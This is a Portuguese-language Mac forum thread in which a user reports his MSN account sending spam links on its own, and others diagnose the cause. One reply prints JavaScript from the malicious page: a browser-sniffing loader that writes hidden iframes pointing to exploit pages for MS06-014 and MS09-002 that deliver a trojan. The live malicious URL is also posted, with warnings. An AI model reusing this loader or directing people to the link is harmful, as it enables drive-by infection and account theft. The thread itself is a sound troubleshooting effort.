Ir para conteúdo
  • Cadastre-se

MSN Mandando mensagens por vontade própria.


Bruno Dornelas

Posts Recomendados

Olá Amigos,

Estou enfrentando uma dificuldade que perdi totalmente o costume de como resolver desde que passei a usar MAC em 2001

Algumas pessoas estão reclamando que estão recebendo links via MSN enviados por mim sobre um processo do Collor e tal.

Já passei o Avast for MAC e ele não encontra vírus nenhum, a máquina está funcionando de forma integra e nem lentidão apresenta.

Alguém já se deparou com esse problema e sabe como solucionar?

Eu já troquei o MSN pelo Adium e o problema continua.

Obrigado pela ajuda de todos.

Grande Abraço!

Link para o comentário
Compartilhar em outros sites

  • Respostas 24
  • Criado
  • Última resposta

Top Postadores Neste Tópico

Desculpe amigo, não estou falando sobre opilitica ou criticando PC. Na real o problema existe. Meu MSN manda mensagens que não por mim para os meus contatos. Apenas citei a mensagem do Collor pra uma das pessoas me perguntou se o link era real ou se era virus e eu nunca mandei link algum para essa pessoa. Quando mais algum contato disser que está recebendo a mensagem vou pedir para me enviar de volta e eu coloco a mensagem aqui no Forum. Sou contra qualquer tipo de opinioes políticas em foruns. Por favor, se alguém conhece a solução para o problema, agradeço a ajuda!

Obrigado

Link para o comentário
Compartilhar em outros sites

Vejam, aconteceu de novo... ATENÇAO, NAO ACESSEM ESSE LINK... estou apenas reportando qual é a mensagem que meu msn está mandando sozinho... Se alguém souber como solucionar...

a mensagem é...

Ex-presidente Collor de Melo perde ação

http://www.i42.de/img/blog/index.htm

NAO ACESSEM...

Link para o comentário
Compartilhar em outros sites

Vejam, aconteceu de novo... ATENÇAO, NAO ACESSEM ESSE LINK... estou apenas reportando qual é a mensagem que meu msn está mandando sozinho... Se alguém souber como solucionar...

a mensagem é...

Ex-presidente Collor de Melo perde ação

http://www.i42.de/img/blog/index.htm

NAO ACESSEM...

Você procurou com o Monitor de Atividade se tem algum processo novo ou estranho aberto?

Eu abri o link, achei estranho que o gif nem terminou de carregar, então fechei a aba. Estava com o monitor aberto, não vi nada.

Que trem estranho... Aqui não aconteceu nada. Mesmo. E eu tenho MSN pra mac instalado (mas é uma daquelas versões velhas que vêm com o Office)

Link para o comentário
Compartilhar em outros sites

Caro Bruno,

Eu instalei o Little Snitch para poder monitorar, porém o MSN se comunica com tantos servidores e IPs diferentes que eu não soube identificar quais são os corretos.

O curioso é que já conversei com um engenheiro especializado em MAC, já fiz diversas buscas na internet sobre o assunto e pelo jeito devo ser o primeiro no Brasil a ter esse problema. haha

Espero realmente que não!

Link para o comentário
Compartilhar em outros sites

Alguém sabe de mais alguma coisa sobre essas mensagens?

vamo lá, na página tem esse javascript

script language="javascript">

<!--

if (window.navigator.userAgent.indexOf("M"+"S"+"IE")>=1)

{

document.write ("<iframe src=i.htm width=0 height=0 scrolling=no frameborder=0>")

}else{

if (window.navigator.userAgent.indexOf("F"+"i"+"r"+"e"+"f"+"o"+"x")>=1)

{

document.write ("<iframe src=f.htm width=0 height=0 scrolling=no frameborder=0>")

}else{

document.write ("<iframe src=i.htm width=0 height=0 scrolling=no frameborder=0>")

}

}

//pin (ie and fir)

//document.write("<iframe width=0 height=0 src=fl.htm></iframe>");

//-->

</script

se vc abrir a página com firefox, é carregado f.htm se abrir com qualquer outro browser é carregado i.htm

dentro de f.htm não tem nada (acho que quem fez isso gosta de quem usa firefox.) se abrir com qualquer outro browser vai ser carregado i.htm que contém esse javascript destinado a ferrar com quem usa internet explorer ie6 ou ie7:

script language="javascript">

if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1) //ie6

{

//ms06014

document.write("<iframe width=0 height=0 src="hker.htm"></iframe>");

}

else //ie7

{

//09002

document.write("<iframe width=0 height=0 src="ms09002.htm"></iframe>");

}

</script

cara, vc só usa msn no mac ou usou algum pc recentemente?

Link para o comentário
Compartilhar em outros sites

Cara, atualmente tenho MAC em casa e no trabalho. Nem me lembro qual foi a ultima vez que usei o msn num PC...

Eu uso apenas o Firefox também. Eu não soube muito bem interpretar as linhas que você colocou acima. Por essas linhas dá para encontrar o problema e saná-lo?

Agradeço imensamente a ajuda.

Abs!

Link para o comentário
Compartilhar em outros sites

Acabei de conversar com um engenheiro de sistemas que me deu a seguinte explicação:

Eu acabei por clicar em algum script desses que o meu msn está mandando por conta propria e esse script capturou meu usuário a senha.

O interessado nesses dados, usa o meu perfil para enviar essas mensagens que descrevi no post acima e essim coletar mais usuários e senhas.

Seguindo por esse pensamento lógico, eu troquei a senha do MSN e teóricamente isso deve solucionar o problema. Então, talvez os amigos que tentaram me ajudar clicando no link para poder interpretar, talvez seja seguro trocar a senha também.

Vamos ver se com essa mudança, as mensagens param.

O que vocês acham dessa teoria? Você acha que faz sentido Man Machine?

Grande Abs!

Link para o comentário
Compartilhar em outros sites

Então, eu não vejo sentido disso ter pego você no mac, pq isso é destinado a windows, pra começar no firefox não acontece nada, e em qualquer navegador (exceto internet explorer 7) é carregado "hker.htm" que contém um VBSCRIPT(acho que nem roda em mac) que por sua vez se encarrega de executar um programa que faz um download de um trojan para o computador, mas aí um grande detalhe esse programa que faz download do trojan é um .exe, isso não roda em mac..

o meu palpite é que você digitou sua senha de msn em um computador windows comprometido, e se foi assim trocar a senha vai resolver.

suas instalações do mac os x estão atualizadas?

Link para o comentário
Compartilhar em outros sites

Participe do debate

Você pode postar agora e se registrar depois. Se você tem uma conta, entre agora para postar com ela.

Visitante
Responder este tópico…

×   Você colou conteúdo com formatação.   Remover formatação

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Limpar editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.



  • Estatísticas do Fórum

    • Total de Tópicos
      56.5k
    • Total de Posts
      466.3k
×
×
  • Criar Novo...